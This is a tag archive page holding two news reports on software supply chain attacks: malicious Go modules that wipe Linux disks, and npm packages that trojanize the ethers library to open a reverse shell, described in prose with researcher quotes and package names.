Tag: supply chain attack

  • Cybersecurity Alert: Malicious Go Modules Found Overwriting Linux Disks

    Cybersecurity Alert: Malicious Go Modules Found Overwriting Linux Disks

    Cybersecurity researchers have unveiled a significant threat associated with three malicious Go modules found on popular repositories. The malware-laden packages, known as github.com/truthfulpharm/prototransform, github.com/blankloggia/go-mcp, and github.com/steelpoor/tlsproxy feature obfuscated code that seeks to overwrite Linux systems’ primary disks, rendering them unbootable.

    Experts highlighted that despite their facade of legitimacy, these modules are programmed to detect Linux operating systems and subsequently fetch destructive payloads from remote servers using Wget. According to Socket researcher Kush Pandya, the payload consists of a harmful shell script intended to irreversibly overwrite the disk, thereby obstructing any recovery attempts.

    “This destructive method ensures no data recovery tool or forensic process can restore the data, as it directly and irreversibly overwrites it,” Pandya stated. As a result, targeted machines become entirely unusable, posing a severe risk in an era where supply chain attacks are increasingly common.

    This revelation coincides with the discovery of additional malicious npm packages aimed at stealing private cryptocurrency keys and sensitive information. Among the identified packages are crypto-encrypt-ts and react-native-scrollpageviewtest, highlighting the growing trend of malicious activity targeting developers and their environments.

    Moreover, a series of malware-infected packages in the Python Package Index (PyPI) further illustrates the pervasive nature of these threats. The packages have collectively been downloaded over 6,800 times, emphasizing the necessity for vigilance in package verification among developers.

    Socket’s Olivia Brown encourages developers to routinely audit their dependencies and verify package authenticity. Brown advises that unusual outbound traffic, particularly over SMTP, be closely monitored to preempt potential exploits leveraging trusted services like Gmail.

  • New Malicious npm Packages Target Open-Source Systems with Sophisticated Attacks

    New Malicious npm Packages Target Open-Source Systems with Sophisticated Attacks

    Cybersecurity experts have identified two malicious packages on the npm registry, marking an alarming evolution in software supply chain attacks aimed at the open-source ecosystem. The identified packages, ethers-provider2 and ethers-providerz, have been found to exploit existing packages installed on users’ systems, changing the landscape of threats facing developers.

    The ethers-provider2 package, published on March 15, 2025, has been downloaded 73 times. Unfortunately, some users unknowingly introduced potential vulnerabilities to their systems. The secondary package, ethers-providerz, appears to have been removed by its author without attracting any downloads.

    According to ReversingLabs researcher Lucija Valentić, the malicious payload embedded in these packages is cleverly disguised as simple downloaders. Their true intent reveals itself during execution when they ‘patch’ the legitimate npm package ethers installed locally with harmful code capable of establishing a reverse shell.

    Notably, removing the malicious packages does not restore system integrity, as changes made to the original ethers package persist. This enables the threat actor to regain access if the code is reapplied, as removing the ethers package without eliminating ethers-provider2 could lead to reinfection during future installations.

    Further analysis reveals that ssh2 was repurposed as a trojanized version within the ethers-provider2 package, executing malicious commands to fetch additional malware from a remote server. The installation script conducts data retrieval operations while attempting to erase traces of its presence.

    Moreover, the functionalities are designed to endure persistent attacks on developer environments, as evidenced by the secondary package’s similar attack vector targeting the @ethersproject/providers. Developer caution is highly advised given the deceptive appearances of these packages.

    As attacks grow increasingly sophisticated, the cybersecurity community stresses the need for vigilance, especially when utilizing open-source libraries and packages. Thorough audits and scrutiny of external packages remain essential to keeping development environments secure.